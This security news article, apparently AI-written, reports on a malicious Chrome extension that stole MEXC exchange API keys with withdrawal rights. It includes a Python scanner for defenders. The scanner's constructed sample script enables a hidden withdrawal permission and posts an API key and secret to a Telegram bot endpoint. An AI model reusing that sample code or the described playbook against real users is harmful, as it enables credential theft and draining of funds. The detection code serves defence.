Ethical Hacking News

A Malicious Chrome Extension Steals MEXC API Keys: A Threat to Cryptocurrency Exchange Security

  • MEXC API Automator, a Google Chrome extension, is designed to steal API keys for the MEXC cryptocurrency exchange.
  • The extension creates new API keys, enables withdrawal permissions, hides that permission in the UI, and exfiltrates the resulting API key and secret to a hardcoded Telegram bot.
  • It had 29 downloads as of writing and was published by "jorjortan142" in September 2025 with a misleading description.
  • The threat actor bypasses traditional controls by riding an already authenticated browser session, gaining control of any MEXC account accessed from the compromised browser.
  • Uninstalling the extension does not end the compromise: the stolen API keys remain usable until they are revoked.


In a recent revelation, cybersecurity researchers have shed light on a malicious Google Chrome extension that has been designed to steal API keys associated with MEXC, a popular centralized cryptocurrency exchange available in over 170 countries. The extension, named MEXC API Automator, has been masquerading as a tool to automate trading on the platform, but its true intention is far more sinister.

According to cybersecurity expert Kirill Boychenko, the extension programmatically creates new MEXC API keys, enables withdrawal permissions, hides that permission in the user interface (UI), and exfiltrates the resulting API key and secret to a hardcoded Telegram bot controlled by the threat actor. This means that once the user installs the extension and navigates to the MEXC API management page, the malicious code injects a script that creates a new API key, enables withdrawal capabilities, and transmits the values to the Telegram bot for exfiltration.
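As an added, defender-side example (not code from the article or from the researchers it cites), the Python script below triages an unpacked extension for the three behaviours just described: a content script scoped to the exchange's API management page, a hardcoded Telegram Bot API endpoint and token, and code that hides a withdrawal permission control. The sample manifest and script are constructed for illustration; the domain list, token shape and hiding heuristics are assumptions, not indicators from the article.

```python
"""Static triage of an unpacked Chrome extension for the behaviours the article
describes. The sample input below is constructed, not the real extension."""
import re

# Heuristic indicators: assumptions made for this example, not from the article.
EXCHANGE_HOSTS = ("mexc.com",)
TELEGRAM_SINK = re.compile(r"https?://api\.telegram\.org/bot", re.I)
# Approximate shape of a Telegram bot token: numeric id, colon, 35-char secret.
BOT_TOKEN = re.compile(r"\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
# "withdraw" followed within 200 chars by code that hides or removes an element.
WITHDRAW_HIDE = re.compile(
    r"withdraw[\s\S]{0,200}?(display\s*[:=]\s*['\"]?none|\.hidden\s*=\s*true|\.remove\(\))", re.I)


def scan_extension(manifest: dict, scripts: dict) -> list:
    """Return (severity, finding) tuples for one unpacked extension."""
    findings = []
    # 1. Which pages can the extension's content scripts read and modify?
    for cs in manifest.get("content_scripts", []):
        for pattern in cs.get("matches", []):
            if any(host in pattern for host in EXCHANGE_HOSTS):
                findings.append(("medium", f"content script runs on exchange page: {pattern}"))
    for name, src in scripts.items():
        # 2. Hardcoded exfiltration channel and credential.
        if TELEGRAM_SINK.search(src):
            findings.append(("high", f"{name}: sends data to the Telegram Bot API"))
        if BOT_TOKEN.search(src):
            findings.append(("high", f"{name}: embedded Telegram bot token"))
        # 3. Withdrawal permission toggled, then hidden from the user.
        if WITHDRAW_HIDE.search(src):
            findings.append(("high", f"{name}: hides a withdrawal permission control"))
    return findings


# Constructed sample mimicking the reported behaviour (not the real code).
SAMPLE_MANIFEST = {"content_scripts": [
    {"matches": ["https://www.mexc.com/user/openapi*"], "js": ["inject.js"]}]}
SAMPLE_SCRIPTS = {"inject.js": (
    "const box = document.querySelector('input[name=withdraw]');\n"
    "box.checked = true; box.closest('label').style.display = 'none';\n"
    "fetch('https://api.telegram.org/bot123456789:" + "A" * 35 + "/sendMessage',"
    " {method: 'POST', body: JSON.stringify({text: key + ':' + secret})});")}

if __name__ == "__main__":
    for severity, message in scan_extension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print(severity.upper(), message)
```

Run it against the `manifest.json` and script files of an unpacked extension directory; a "high" finding is a reason to revoke any exchange API keys created while the extension was installed.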

The impact of this attack is severe, as it allows the threat actor to control any MEXC account accessed from the compromised browser, granting them access to execute trades, perform automated withdrawals, drain wallets and balances, and potentially compromise user accounts. The extension's ability to bypass traditional controls and leverage an already authenticated browser session makes it a formidable threat.

The malicious extension has been available on the Chrome Web Store with 29 downloads as of the time of writing. It was first published by a developer named "jorjortan142" on September 1, 2025, and was described as an extension that simplifies connecting your trading bot to the MEXC exchange by generating API keys with necessary permissions.

The attack is made possible by the fact that it leverages an already authenticated browser session to realize its goals, thereby obviating the need to obtain the user's password or bypass authentication protections. It also means that uninstalling the extension from Chrome does not end the compromise: the threat actor retains access through the exfiltrated API keys for as long as those keys remain valid and are not revoked.

The threat actor behind this operation is currently unknown, but a reference to "jorjortan142" points to an X handle with the same name that links to a Telegram bot named SwapSushiBot. This bot promotes various content across TikTok and YouTube, suggesting that the threat actor may be using these platforms to promote their malicious activities.

According to Boychenko, the extension is designed to target MEXC API keys at the moment they are created and configured with full permissions. By hijacking a single API workflow inside the browser, threat actors can bypass many traditional controls and go straight for long-lived API keys with withdrawal rights. This means that the same playbook used in this attack can be readily adapted to other exchanges, DeFi dashboards, broker portals, and any web console that issues tokens in session.

The fact that the extension has not been removed from the Chrome Web Store despite its malicious nature highlights a critical vulnerability in the platform's review process. It is clear that more needs to be done to ensure that extensions on the Chrome Web Store are thoroughly vetted for security risks before they become available to users.

As cybersecurity threats continue to evolve and become more sophisticated, it is essential for users to remain vigilant and take steps to protect themselves from such malicious activities. This includes keeping their software and browsers up to date, using reputable antivirus software, and being cautious when installing new extensions or clicking on suspicious links. Anyone who installed this extension should also review and revoke the API keys it created, since uninstalling the extension alone does not invalidate them.

In conclusion, the MEXC API Automator extension represents a significant threat to cryptocurrency exchange security, highlighting the need for increased vigilance and awareness among users and developers alike. By understanding the tactics and techniques used by malicious actors like the one behind this extension, we can better equip ourselves to defend against similar attacks in the future.



Related Information:
  • https://www.ethicalhackingnews.com/articles/A-Malicious-Chrome-Extension-Steals-MEXC-API-Keys-A-Threat-to-Cryptocurrency-Exchange-Security-ehn.shtml
  • https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html
  • https://cyberpress.org/malicious-chrome-extension-mexc-wallet-credential-theft/
  • https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys


  • Published: Tue Jan 13 11:31:58 2026 by llama3.2 3B Q4_K_M